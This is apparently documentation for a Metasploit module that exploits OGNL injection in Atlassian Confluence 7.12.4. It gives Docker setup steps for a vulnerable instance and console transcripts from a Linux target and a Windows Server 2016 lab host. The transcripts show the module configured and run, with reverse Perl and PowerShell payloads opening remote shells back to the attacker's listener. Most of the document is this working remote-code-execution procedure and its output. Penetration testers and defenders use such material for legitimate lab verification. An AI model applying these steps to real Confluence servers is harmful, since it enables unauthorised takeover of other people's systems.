## Vulnerable Application

### Setup

Run the following [Docker] command to test Confluence **7.12.4**:

`docker run -dp 8090:8090 atlassian/confluence:7.12.4`

You will need to [complete setup] once the container has started.

[Docker]: https://hub.docker.com/r/atlassian/confluence
[complete setup]: https://confluence.atlassian.com/doc/confluence-setup-guide-135691.html

## Verification Steps

Follow [Setup](#setup) and [Scenarios](#scenarios).

## Scenarios

### Confluence 7.12.4 in [Docker]

```
msf6 > use exploit/multi/http/atlassian_confluence_webwork_ognl_injection
[*] Using configured payload cmd/unix/reverse_perl
msf6 exploit(multi/http/atlassian_confluence_webwork_ognl_injection) > options

Module options (exploit/multi/http/atlassian_confluence_webwork_ognl_injection):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT      8090             yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       Base path
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


Payload options (cmd/unix/reverse_perl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Unix Command


msf6 exploit(multi/http/atlassian_confluence_webwork_ognl_injection) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf6 exploit(multi/http/atlassian_confluence_webwork_ognl_injection) > set lhost 172.16.57.1
lhost => 172.16.57.1
msf6 exploit(multi/http/atlassian_confluence_webwork_ognl_injection) > run

[*] Started reverse TCP handler on 172.16.57.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Successfully tested OGNL injection.
[*] Executing cmd/unix/reverse_perl (Unix Command)
[*] Command shell session 1 opened (172.16.57.1:4444 -> 172.16.57.1:62795 ) at 2021-10-14 16:31:23 -0500

whoami
confluence
^Z
Background session 1? [y/N]  y
```

### Confluence 7.12.4 on Windows Server 2016

```
msf6 exploit(multi/http/atlassian_confluence_webwork_ognl_injection) > set rhosts 172.16.57.9
rhosts => 172.16.57.9
msf6 exploit(multi/http/atlassian_confluence_webwork_ognl_injection) > set target 2
target => 2
msf6 exploit(multi/http/atlassian_confluence_webwork_ognl_injection) > run

[*] Started reverse SSL handler on 172.16.57.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Successfully tested OGNL injection.
[*] Executing cmd/windows/powershell_reverse_tcp (Windows Command)
[*] Powershell session session 2 opened (172.16.57.1:4444 -> 172.16.57.9:61152 ) at 2021-10-14 16:31:59 -0500

PS C:\Program Files\Atlassian\Confluence> whoami
nt authority\network service
PS C:\Program Files\Atlassian\Confluence>
```
